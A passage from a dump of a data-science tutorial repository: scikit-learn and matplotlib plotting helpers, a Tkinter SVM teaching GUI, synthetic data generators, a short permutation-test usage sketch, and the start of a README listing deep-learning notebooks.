0.45, "yes", 12, alpha=0.4) text(ax, 0.34, 0.45, "no", 12, alpha=0.4) text(ax, 0.66, 0.45, "yes", 12, alpha=0.4) text(ax, 0.79, 0.45, "no", 12, alpha=0.4) ax.plot([0.3, 0.5, 0.7], [0.6, 0.9, 0.6], '-k') ax.plot([0.12, 0.3, 0.38], [0.3, 0.6, 0.3], '-k') ax.plot([0.62, 0.7, 0.88], [0.3, 0.6, 0.3], '-k') ax.plot([0.0, 0.12, 0.20], [0.0, 0.3, 0.0], '--k') ax.plot([0.28, 0.38, 0.48], [0.0, 0.3, 0.0], '--k') ax.plot([0.52, 0.62, 0.72], [0.0, 0.3, 0.0], '--k') ax.plot([0.8, 0.88, 1.0], [0.0, 0.3, 0.0], '--k') ax.axis([0, 1, 0, 1]) def visualize_tree(estimator, X, y, boundaries=True, xlim=None, ylim=None): estimator.fit(X, y) 
if xlim is None: xlim = (X[:, 0].min() - 0.1, X[:, 0].max() + 0.1) if ylim is None: ylim = (X[:, 1].min() - 0.1, X[:, 1].max() + 0.1) x_min, x_max = xlim y_min, y_max = ylim xx, yy = np.meshgrid(np.linspace(x_min, x_max, 100), np.linspace(y_min, y_max, 100)) Z = estimator.predict(np.c_[xx.ravel(), yy.ravel()]) # Put the result into a color plot Z = Z.reshape(xx.shape) plt.figure() plt.pcolormesh(xx, yy, Z, alpha=0.2, cmap='rainbow') plt.clim(y.min(), y.max()) # Plot also the training points plt.scatter(X[:, 0], X[:, 1], c=y, s=50, cmap='rainbow') plt.axis('off') plt.xlim(x_min, x_max) plt.ylim(y_min, y_max) plt.clim(y.min(), y.max()) # Plot the decision boundaries def plot_boundaries(i, xlim, ylim): if i < 0: return tree = estimator.tree_ if tree.feature[i] == 0: plt.plot([tree.threshold[i], tree.threshold[i]], ylim, '-k') plot_boundaries(tree.children_left[i], [xlim[0], tree.threshold[i]], ylim) plot_boundaries(tree.children_right[i], [tree.threshold[i], xlim[1]], ylim) elif tree.feature[i] == 1: plt.plot(xlim, [tree.threshold[i], tree.threshold[i]], '-k') plot_boundaries(tree.children_left[i], xlim, [ylim[0], tree.threshold[i]]) plot_boundaries(tree.children_right[i], xlim, [tree.threshold[i], ylim[1]]) if boundaries: plot_boundaries(0, plt.xlim(), plt.ylim()) def plot_tree_interactive(X, y): from sklearn.tree import DecisionTreeClassifier def interactive_tree(depth=1): clf = DecisionTreeClassifier(max_depth=depth, random_state=0) visualize_tree(clf, X, y) from IPython.html.widgets import interact return interact(interactive_tree, depth=[1, 5]) def plot_kmeans_interactive(min_clusters=1, max_clusters=6): from IPython.html.widgets import interact from sklearn.metrics.pairwise import euclidean_distances from sklearn.datasets.samples_generator import make_blobs with warnings.catch_warnings(): warnings.filterwarnings('ignore') X, y = make_blobs(n_samples=300, centers=4, random_state=0, cluster_std=0.60) def _kmeans_step(frame=0, n_clusters=4): rng = np.random.RandomState(2) labels = np.zeros(X.shape[0]) centers = rng.randn(n_clusters, 2) nsteps = frame // 3 for i in range(nsteps + 1): old_centers = centers if i < nsteps or frame % 3 > 0: dist = euclidean_distances(X, centers) labels = dist.argmin(1) if i < nsteps or frame % 3 > 1: centers = np.array([X[labels == j].mean(0) for j in range(n_clusters)]) nans = np.isnan(centers) centers[nans] = old_centers[nans] # plot the data and cluster centers plt.scatter(X[:, 0], X[:, 1], c=labels, s=50, cmap='rainbow', vmin=0, vmax=n_clusters - 1); plt.scatter(old_centers[:, 0], old_centers[:, 1], marker='o', c=np.arange(n_clusters), s=200, cmap='rainbow') plt.scatter(old_centers[:, 0], old_centers[:, 1], marker='o', c='black', s=50) # plot new centers if third frame if frame % 3 == 2: for i in range(n_clusters): plt.annotate('', centers[i], old_centers[i], arrowprops=dict(arrowstyle='->', linewidth=1)) plt.scatter(centers[:, 0], centers[:, 1], marker='o', c=np.arange(n_clusters), s=200, cmap='rainbow') plt.scatter(centers[:, 0], centers[:, 1], marker='o', c='black', s=50) plt.xlim(-4, 4) plt.ylim(-2, 10) if frame % 3 == 1: plt.text(3.8, 9.5, "1. Reassign points to nearest centroid", ha='right', va='top', size=14) elif frame % 3 == 2: plt.text(3.8, 9.5, "2. 
Update centroids to cluster means", ha='right', va='top', size=14) return interact(_kmeans_step, frame=[0, 50], n_clusters=[min_clusters, max_clusters]) def plot_image_components(x, coefficients=None, mean=0, components=None, imshape=(8, 8), n_components=6, fontsize=12): if coefficients is None: coefficients = x if components is None: components = np.eye(len(coefficients), len(x)) mean = np.zeros_like(x) + mean fig = plt.figure(figsize=(1.2 * (5 + n_components), 1.2 * 2)) g = plt.GridSpec(2, 5 + n_components, hspace=0.3) def show(i, j, x, title=None): ax = fig.add_subplot(g[i, j], xticks=[], yticks=[]) ax.imshow(x.reshape(imshape), interpolation='nearest') if title: ax.set_title(title, fontsize=fontsize) show(slice(2), slice(2), x, "True") approx = mean.copy() show(0, 2, np.zeros_like(x) + mean, r'$\mu$') show(1, 2, approx, r'$1 \cdot \mu$') for i in range(0, n_components): approx = approx + coefficients[i] * components[i] show(0, i + 3, components[i], r'$c_{0}$'.format(i + 1)) show(1, i + 3, approx, r"${0:.2f} \cdot c_{1}$".format(coefficients[i], i + 1)) plt.gca().text(0, 1.05, '$+$', ha='right', va='bottom', transform=plt.gca().transAxes, fontsize=fontsize) show(slice(2), slice(-2, None), approx, "Approx") def plot_pca_interactive(data, n_components=6): from sklearn.decomposition import PCA from IPython.html.widgets import interact pca = PCA(n_components=n_components) Xproj = pca.fit_transform(data) def show_decomp(i=0): plot_image_components(data[i], Xproj[i], pca.mean_, pca.components_) interact(show_decomp, i=(0, data.shape[0] - 1)); File: scikit-learn/fig_code/svm_gui.py """ ========== Libsvm GUI ========== A simple graphical frontend for Libsvm mainly intended for didactic purposes. You can create data points by point and click and visualize the decision region induced by different kernels and parameter settings. To create positive examples click the left mouse button; to create negative examples click the right button. If all examples are from the same class, it uses a one-class SVM. """ from __future__ import division, print_function print(__doc__) # Author: Peter Prettenhoer <[email protected]> # # License: BSD 3 clause import matplotlib matplotlib.use('TkAgg') from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg from matplotlib.backends.backend_tkagg import NavigationToolbar2TkAgg from matplotlib.figure import Figure from matplotlib.contour import ContourSet import Tkinter as Tk import sys import numpy as np from sklearn import svm from sklearn.datasets import dump_svmlight_file from sklearn.externals.six.moves import xrange y_min, y_max = -50, 50 x_min, x_max = -50, 50 class Model(object): """The Model which hold the data. It implements the observable in the observer pattern and notifies the registered observers on change event. """ def __init__(self): self.observers = [] self.surface = None self.data = [] self.cls = None self.surface_type = 0 def changed(self, event): """Notify the observers. """ for observer in self.observers: observer.update(event, self) def add_observer(self, observer): """Register an observer. 
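        observer: any object with an update(event, model) method; it is invoked
        every time the model's changed() fires.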
""" self.observers.append(observer) def set_surface(self, surface): self.surface = surface def dump_svmlight_file(self, file): data = np.array(self.data) X = data[:, 0:2] y = data[:, 2] dump_svmlight_file(X, y, file) class Controller(object): def __init__(self, model): self.model = model self.kernel = Tk.IntVar() self.surface_type = Tk.IntVar() # Whether or not a model has been fitted self.fitted = False def fit(self): print("fit the model") train = np.array(self.model.data) X = train[:, 0:2] y = train[:, 2] C = float(self.complexity.get()) gamma = float(self.gamma.get()) coef0 = float(self.coef0.get()) degree = int(self.degree.get()) kernel_map = {0: "linear", 1: "rbf", 2: "poly"} if len(np.unique(y)) == 1: clf = svm.OneClassSVM(kernel=kernel_map[self.kernel.get()], gamma=gamma, coef0=coef0, degree=degree) clf.fit(X) else: clf = svm.SVC(kernel=kernel_map[self.kernel.get()], C=C, gamma=gamma, coef0=coef0, degree=degree) clf.fit(X, y) if hasattr(clf, 'score'): print("Accuracy:", clf.score(X, y) * 100) X1, X2, Z = self.decision_surface(clf) self.model.clf = clf self.model.set_surface((X1, X2, Z)) self.model.surface_type = self.surface_type.get() self.fitted = True self.model.changed("surface") def decision_surface(self, cls): delta = 1 x = np.arange(x_min, x_max + delta, delta) y = np.arange(y_min, y_max + delta, delta) X1, X2 = np.meshgrid(x, y) Z = cls.decision_function(np.c_[X1.ravel(), X2.ravel()]) Z = Z.reshape(X1.shape) return X1, X2, Z def clear_data(self): self.model.data = [] self.fitted = False self.model.changed("clear") def add_example(self, x, y, label): self.model.data.append((x, y, label)) self.model.changed("example_added") # update decision surface if already fitted. self.refit() def refit(self): """Refit the model if already fitted. """ if self.fitted: self.fit() class View(object): """Test docstring. 
""" def __init__(self, root, controller): f = Figure() ax = f.add_subplot(111) ax.set_xticks([]) ax.set_yticks([]) ax.set_xlim((x_min, x_max)) ax.set_ylim((y_min, y_max)) canvas = FigureCanvasTkAgg(f, master=root) canvas.show() canvas.get_tk_widget().pack(side=Tk.TOP, fill=Tk.BOTH, expand=1) canvas._tkcanvas.pack(side=Tk.TOP, fill=Tk.BOTH, expand=1) canvas.mpl_connect('key_press_event', self.onkeypress) canvas.mpl_connect('key_release_event', self.onkeyrelease) canvas.mpl_connect('button_press_event', self.onclick) toolbar = NavigationToolbar2TkAgg(canvas, root) toolbar.update() self.shift_down = False self.controllbar = ControllBar(root, controller) self.f = f self.ax = ax self.canvas = canvas self.controller = controller self.contours = [] self.c_labels = None self.plot_kernels() def plot_kernels(self): self.ax.text(-50, -60, "Linear: $u^T v$") self.ax.text(-20, -60, "RBF: $\exp (-\gamma \| u-v \|^2)$") self.ax.text(10, -60, "Poly: $(\gamma \, u^T v + r)^d$") def onkeypress(self, event): if event.key == "shift": self.shift_down = True def onkeyrelease(self, event): if event.key == "shift": self.shift_down = False def onclick(self, event): if event.xdata and event.ydata: if self.shift_down or event.button == 3: self.controller.add_example(event.xdata, event.ydata, -1) elif event.button == 1: self.controller.add_example(event.xdata, event.ydata, 1) def update_example(self, model, idx): x, y, l = model.data[idx] if l == 1: color = 'w' elif l == -1: color = 'k' self.ax.plot([x], [y], "%so" % color, scalex=0.0, scaley=0.0) def update(self, event, model): if event == "examples_loaded": for i in xrange(len(model.data)): self.update_example(model, i) if event == "example_added": self.update_example(model, -1) if event == "clear": self.ax.clear() self.ax.set_xticks([]) self.ax.set_yticks([]) self.contours = [] self.c_labels = None self.plot_kernels() if event == "surface": self.remove_surface() self.plot_support_vectors(model.clf.support_vectors_) self.plot_decision_surface(model.surface, model.surface_type) self.canvas.draw() def remove_surface(self): """Remove old decision surface.""" if len(self.contours) > 0: for contour in self.contours: if isinstance(contour, ContourSet): for lineset in contour.collections: lineset.remove() else: contour.remove() self.contours = [] def plot_support_vectors(self, support_vectors): """Plot the support vectors by placing circles over the corresponding data points and adds the circle collection to the contours list.""" cs = self.ax.scatter(support_vectors[:, 0], support_vectors[:, 1], s=80, edgecolors="k", facecolors="none") self.contours.append(cs) def plot_decision_surface(self, surface, type): X1, X2, Z = surface if type == 0: levels = [-1.0, 0.0, 1.0] linestyles = ['dashed', 'solid', 'dashed'] colors = 'k' self.contours.append(self.ax.contour(X1, X2, Z, levels, colors=colors, linestyles=linestyles)) elif type == 1: self.contours.append(self.ax.contourf(X1, X2, Z, 10, cmap=matplotlib.cm.bone, origin='lower', alpha=0.85)) self.contours.append(self.ax.contour(X1, X2, Z, [0.0], colors='k', linestyles=['solid'])) else: raise ValueError("surface type unknown") class ControllBar(object): def __init__(self, root, controller): fm = Tk.Frame(root) kernel_group = Tk.Frame(fm) Tk.Radiobutton(kernel_group, text="Linear", variable=controller.kernel, value=0, command=controller.refit).pack(anchor=Tk.W) Tk.Radiobutton(kernel_group, text="RBF", variable=controller.kernel, value=1, command=controller.refit).pack(anchor=Tk.W) Tk.Radiobutton(kernel_group, text="Poly", 
variable=controller.kernel, value=2, command=controller.refit).pack(anchor=Tk.W) kernel_group.pack(side=Tk.LEFT) valbox = Tk.Frame(fm) controller.complexity = Tk.StringVar() controller.complexity.set("1.0") c = Tk.Frame(valbox) Tk.Label(c, text="C:", anchor="e", width=7).pack(side=Tk.LEFT) Tk.Entry(c, width=6, textvariable=controller.complexity).pack( side=Tk.LEFT) c.pack() controller.gamma = Tk.StringVar() controller.gamma.set("0.01") g = Tk.Frame(valbox) Tk.Label(g, text="gamma:", anchor="e", width=7).pack(side=Tk.LEFT) Tk.Entry(g, width=6, textvariable=controller.gamma).pack(side=Tk.LEFT) g.pack() controller.degree = Tk.StringVar() controller.degree.set("3") d = Tk.Frame(valbox) Tk.Label(d, text="degree:", anchor="e", width=7).pack(side=Tk.LEFT) Tk.Entry(d, width=6, textvariable=controller.degree).pack(side=Tk.LEFT) d.pack() controller.coef0 = Tk.StringVar() controller.coef0.set("0") r = Tk.Frame(valbox) Tk.Label(r, text="coef0:", anchor="e", width=7).pack(side=Tk.LEFT) Tk.Entry(r, width=6, textvariable=controller.coef0).pack(side=Tk.LEFT) r.pack() valbox.pack(side=Tk.LEFT) cmap_group = Tk.Frame(fm) Tk.Radiobutton(cmap_group, text="Hyperplanes", variable=controller.surface_type, value=0, command=controller.refit).pack(anchor=Tk.W) Tk.Radiobutton(cmap_group, text="Surface", variable=controller.surface_type, value=1, command=controller.refit).pack(anchor=Tk.W) cmap_group.pack(side=Tk.LEFT) train_button = Tk.Button(fm, text='Fit', width=5, command=controller.fit) train_button.pack() fm.pack(side=Tk.LEFT) Tk.Button(fm, text='Clear', width=5, command=controller.clear_data).pack(side=Tk.LEFT) def get_parser(): from optparse import OptionParser op = OptionParser() op.add_option("--output", action="store", type="str", dest="output", help="Path where to dump data.") return op def main(argv): op = get_parser() opts, args = op.parse_args(argv[1:]) root = Tk.Tk() model = Model() controller = Controller(model) root.wm_title("Scikit-learn Libsvm GUI") view = View(root, controller) model.add_observer(view) Tk.mainloop() if opts.output: model.dump_svmlight_file(opts.output) if __name__ == "__main__": main(sys.argv) File: scikit-learn/fig_code/linear_regression.py import numpy as np import matplotlib.pyplot as plt from sklearn.linear_model import LinearRegression def plot_linear_regression(): a = 0.5 b = 1.0 # x from 0 to 10 x = 30 * np.random.random(20) # y = a*x + b with noise y = a * x + b + np.random.normal(size=x.shape) # create a linear regression classifier clf = LinearRegression() clf.fit(x[:, None], y) # predict y from the data x_new = np.linspace(0, 30, 100) y_new = clf.predict(x_new[:, None]) # plot the results ax = plt.axes() ax.scatter(x, y) ax.plot(x_new, y_new) ax.set_xlabel('x') ax.set_ylabel('y') ax.axis('tight') if __name__ == '__main__': plot_linear_regression() plt.show() File: scikit-learn/fig_code/helpers.py """ Small helpers for code that is not shown in the notebooks """ from sklearn import neighbors, datasets, linear_model import pylab as pl import numpy as np from matplotlib.colors import ListedColormap # Create color maps for 3-class classification problem, as with iris cmap_light = ListedColormap(['#FFAAAA', '#AAFFAA', '#AAAAFF']) cmap_bold = ListedColormap(['#FF0000', '#00FF00', '#0000FF']) def plot_iris_knn(): iris = datasets.load_iris() X = iris.data[:, :2] # we only take the first two features. 
We could # avoid this ugly slicing by using a two-dim dataset y = iris.target knn = neighbors.KNeighborsClassifier(n_neighbors=5) knn.fit(X, y) x_min, x_max = X[:, 0].min() - .1, X[:, 0].max() + .1 y_min, y_max = X[:, 1].min() - .1, X[:, 1].max() + .1 xx, yy = np.meshgrid(np.linspace(x_min, x_max, 100), np.linspace(y_min, y_max, 100)) Z = knn.predict(np.c_[xx.ravel(), yy.ravel()]) # Put the result into a color plot Z = Z.reshape(xx.shape) pl.figure() pl.pcolormesh(xx, yy, Z, cmap=cmap_light) # Plot also the training points pl.scatter(X[:, 0], X[:, 1], c=y, cmap=cmap_bold) pl.xlabel('sepal length (cm)') pl.ylabel('sepal width (cm)') pl.axis('tight') def plot_polynomial_regression(): rng = np.random.RandomState(0) x = 2*rng.rand(100) - 1 f = lambda t: 1.2 * t**2 + .1 * t**3 - .4 * t **5 - .5 * t ** 9 y = f(x) + .4 * rng.normal(size=100) x_test = np.linspace(-1, 1, 100) pl.figure() pl.scatter(x, y, s=4) X = np.array([x**i for i in range(5)]).T X_test = np.array([x_test**i for i in range(5)]).T regr = linear_model.LinearRegression() regr.fit(X, y) pl.plot(x_test, regr.predict(X_test), label='4th order') X = np.array([x**i for i in range(10)]).T X_test = np.array([x_test**i for i in range(10)]).T regr = linear_model.LinearRegression() regr.fit(X, y) pl.plot(x_test, regr.predict(X_test), label='9th order') pl.legend(loc='best') pl.axis('tight') pl.title('Fitting a 4th and a 9th order polynomial') pl.figure() pl.scatter(x, y, s=4) pl.plot(x_test, f(x_test), label="truth") pl.axis('tight') pl.title('Ground truth (9th order polynomial)') File: scikit-learn/fig_code/data.py import numpy as np def linear_data_sample(N=40, rseed=0, m=3, b=-2): rng = np.random.RandomState(rseed) x = 10 * rng.rand(N) dy = m / 2 * (1 + rng.rand(N)) y = m * x + b + dy * rng.randn(N) return (x, y, dy) def linear_data_sample_big_errs(N=40, rseed=0, m=3, b=-2): rng = np.random.RandomState(rseed) x = 10 * rng.rand(N) dy = m / 2 * (1 + rng.rand(N)) dy[20:25] *= 10 y = m * x + b + dy * rng.randn(N) return (x, y, dy) def sample_light_curve(phased=True): from astroML.datasets import fetch_LINEAR_sample data = fetch_LINEAR_sample() t, y, dy = data[18525697].T if phased: P_best = 0.580313015651 t /= P_best return (t, y, dy) def sample_light_curve_2(phased=True): from astroML.datasets import fetch_LINEAR_sample data = fetch_LINEAR_sample() t, y, dy = data[10022663].T if phased: P_best = 0.61596079804 t /= P_best return (t, y, dy) File: spark/__init__.py File: pandas/__init__.py
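Usage note (not part of any repository file): the `HypothesisTest` base class in the statistics module above leaves `TestStatistic`, `MakeModel`, and `RunModel` to subclasses, which can be hard to picture from the abstract methods alone. The sketch below is a minimal, self-contained permutation test written in the same pattern; the class name `DiffMeansPermute` and the toy data are illustrative assumptions, not code from this repo.

```python
import numpy as np


class DiffMeansPermute:
    """Minimal, self-contained sketch of the HypothesisTest pattern above:
    the test statistic is the absolute difference in group means, and the
    null model shuffles the pooled data and re-splits it into two groups
    of the original sizes."""

    def __init__(self, group1, group2):
        self.group1 = np.asarray(group1, dtype=float)
        self.group2 = np.asarray(group2, dtype=float)
        self.n = len(self.group1)
        self.pool = np.concatenate([self.group1, self.group2])
        self.actual = self.TestStatistic((self.group1, self.group2))

    def TestStatistic(self, data):
        xs, ys = data
        return abs(np.mean(xs) - np.mean(ys))

    def RunModel(self):
        # Simulate data under the null hypothesis: shuffle and re-split the pool.
        shuffled = np.random.permutation(self.pool)
        return shuffled[:self.n], shuffled[self.n:]

    def PValue(self, iters=1000):
        # Fraction of simulated statistics at least as extreme as the observed one.
        stats = [self.TestStatistic(self.RunModel()) for _ in range(iters)]
        return sum(1 for s in stats if s >= self.actual) / iters


if __name__ == '__main__':
    rng = np.random.default_rng(0)
    ht = DiffMeansPermute(rng.normal(0.0, 1.0, 100), rng.normal(0.3, 1.0, 100))
    print('observed diff:', ht.actual)
    print('approx p-value:', ht.PValue(iters=2000))
```

With the actual class you would subclass `HypothesisTest` and override only `TestStatistic` and `RunModel` (plus `MakeModel` where needed); `PValue`, `MaxTestStat`, and `PlotCdf` then come for free.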
<br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/README_1200x800.gif"> </p> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/coversmall_alt.png"> <br/> </p> # data-science-ipython-notebooks ## Index * [deep-learning](#deep-learning) * [tensorflow](#tensor-flow-tutorials) * [theano](#theano-tutorials) * [keras](#keras-tutorials) * [caffe](#deep-learning-misc) * [scikit-learn](#scikit-learn) * [statistical-inference-scipy](#statistical-inference-scipy) * [pandas](#pandas) * [matplotlib](#matplotlib) * [numpy](#numpy) * [python-data](#python-data) * [kaggle-and-business-analyses](#kaggle-and-business-analyses) * [spark](#spark) * [mapreduce-python](#mapreduce-python) * [amazon web services](#aws) * [command lines](#commands) * [misc](#misc) * [notebook-installation](#notebook-installation) * [credits](#credits) * [contributing](#contributing) * [contact-info](#contact-info) * [license](#license) <br/> <p align="center"> <img src="http://i.imgur.com/ZhKXrKZ.png"> </p> ## deep-learning IPython Notebook(s) demonstrating deep learning functionality. <br/> <p align="center"> <img src="https://avatars0.githubusercontent.com/u/15658638?v=3&s=100"> </p> ### tensor-flow-tutorials Additional TensorFlow tutorials: * [pkmital/tensorflow_tutorials](https://github.com/pkmital/tensorflow_tutorials) * [nlintz/TensorFlow-Tutorials](https://github.com/nlintz/TensorFlow-Tutorials) * [alrojo/tensorflow-tutorial](https://github.com/alrojo/tensorflow-tutorial) * [BinRoot/TensorFlow-Book](https://github.com/BinRoot/TensorFlow-Book) * [tuanavu/tensorflow-basic-tutorials](https://github.com/tuanavu/tensorflow-basic-tutorials) | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [tsf-basics](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/1_intro/basic_operations.ipynb) | Learn basic operations in TensorFlow, a library for various kinds of perceptual and language understanding tasks from Google. | | [tsf-linear](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/2_basic_classifiers/linear_regression.ipynb) | Implement linear regression in TensorFlow. | | [tsf-logistic](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/2_basic_classifiers/logistic_regression.ipynb) | Implement logistic regression in TensorFlow. | | [tsf-nn](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/2_basic_classifiers/nearest_neighbor.ipynb) | Implement nearest neighboars in TensorFlow. | | [tsf-alex](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/3_neural_networks/alexnet.ipynb) | Implement AlexNet in TensorFlow. 
| | [tsf-cnn](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/3_neural_networks/convolutional_network.ipynb) | Implement convolutional neural networks in TensorFlow. | | [tsf-mlp](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/3_neural_networks/multilayer_perceptron.ipynb) | Implement multilayer perceptrons in TensorFlow. | | [tsf-rnn](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/3_neural_networks/recurrent_network.ipynb) | Implement recurrent neural networks in TensorFlow. | | [tsf-gpu](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/4_multi_gpu/multigpu_basics.ipynb) | Learn about basic multi-GPU computation in TensorFlow. | | [tsf-gviz](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/5_ui/graph_visualization.ipynb) | Learn about graph visualization in TensorFlow. | | [tsf-lviz](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/5_ui/loss_visualization.ipynb) | Learn about loss visualization in TensorFlow. | ### tensor-flow-exercises | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [tsf-not-mnist](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-exercises/1_notmnist.ipynb) | Learn simple data curation by creating a pickle with formatted datasets for training, development and testing in TensorFlow. | | [tsf-fully-connected](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-exercises/2_fullyconnected.ipynb) | Progressively train deeper and more accurate models using logistic regression and neural networks in TensorFlow. | | [tsf-regularization](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-exercises/3_regularization.ipynb) | Explore regularization techniques by training fully connected networks to classify notMNIST characters in TensorFlow. | | [tsf-convolutions](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-exercises/4_convolutions.ipynb) | Create convolutional neural networks in TensorFlow. | | [tsf-word2vec](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-exercises/5_word2vec.ipynb) | Train a skip-gram model over Text8 data in TensorFlow. | | [tsf-lstm](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-exercises/6_lstm.ipynb) | Train a LSTM character model over Text8 data in TensorFlow. 
| <br/> <p align="center"> <img src="http://www.deeplearning.net/software/theano/_static/theano_logo_allblue_200x46.png"> </p> ### theano-tutorials | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [theano-intro](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/theano-tutorial/intro_theano/intro_theano.ipynb) | Intro to Theano, which allows you to define, optimize, and evaluate mathematical expressions involving multi-dimensional arrays efficiently. It can use GPUs and perform efficient symbolic differentiation. | | [theano-scan](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/theano-tutorial/scan_tutorial/scan_tutorial.ipynb) | Learn scans, a mechanism to perform loops in a Theano graph. | | [theano-logistic](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/theano-tutorial/intro_theano/logistic_regression.ipynb) | Implement logistic regression in Theano. | | [theano-rnn](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/theano-tutorial/rnn_tutorial/simple_rnn.ipynb) | Implement recurrent neural networks in Theano. | | [theano-mlp](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/theano-tutorial/theano_mlp/theano_mlp.ipynb) | Implement multilayer perceptrons in Theano. | <br/> <p align="center"> <img src="http://i.imgur.com/L45Q8c2.jpg"> </p> ### keras-tutorials | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | keras | Keras is an open source neural network library written in Python. It is capable of running on top of either Tensorflow or Theano. | | [setup](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/0.%20Preamble.ipynb) | Learn about the tutorial goals and how to set up your Keras environment. | | [intro-deep-learning-ann](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/1.1%20Introduction%20-%20Deep%20Learning%20and%20ANN.ipynb) | Get an intro to deep learning with Keras and Artificial Neural Networks (ANN). | | [theano](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/1.2%20Introduction%20-%20Theano.ipynb) | Learn about Theano by working with weights matrices and gradients. | | [keras-otto](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/1.3%20Introduction%20-%20Keras.ipynb) | Learn about Keras by looking at the Kaggle Otto challenge. | | [ann-mnist](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/1.4%20%28Extra%29%20A%20Simple%20Implementation%20of%20ANN%20for%20MNIST.ipynb) | Review a simple implementation of ANN for MNIST using Keras. 
| | [conv-nets](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/2.1%20Supervised%20Learning%20-%20ConvNets.ipynb) | Learn about Convolutional Neural Networks (CNNs) with Keras. | | [conv-net-1](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/2.2.1%20Supervised%20Learning%20-%20ConvNet%20HandsOn%20Part%20I.ipynb) | Recognize handwritten digits from MNIST using Keras - Part 1. | | [conv-net-2](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/2.2.2%20Supervised%20Learning%20-%20ConvNet%20HandsOn%20Part%20II.ipynb) | Recognize handwritten digits from MNIST using Keras - Part 2. | | [keras-models](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/2.3%20Supervised%20Learning%20-%20Famous%20Models%20with%20Keras.ipynb) | Use pre-trained models such as VGG16, VGG19, ResNet50, and Inception v3 with Keras. | | [auto-encoders](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/3.1%20Unsupervised%20Learning%20-%20AutoEncoders%20and%20Embeddings.ipynb) | Learn about Autoencoders with Keras. | | [rnn-lstm](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/3.2%20RNN%20and%20LSTM.ipynb) | Learn about Recurrent Neural Networks (RNNs) with Keras. | | [lstm-sentence-gen](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/3.3%20%28Extra%29%20LSTM%20for%20Sentence%20Generation.ipynb) | Learn about RNNs using Long Short Term Memory (LSTM) networks with Keras. | ### deep-learning-misc | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [deep-dream](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/deep-dream/dream.ipynb) | Caffe-based computer vision program which uses a convolutional neural network to find and enhance patterns in images. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/scikitlearn.png"> </p> ## scikit-learn IPython Notebook(s) demonstrating scikit-learn functionality. | Notebook | Description | 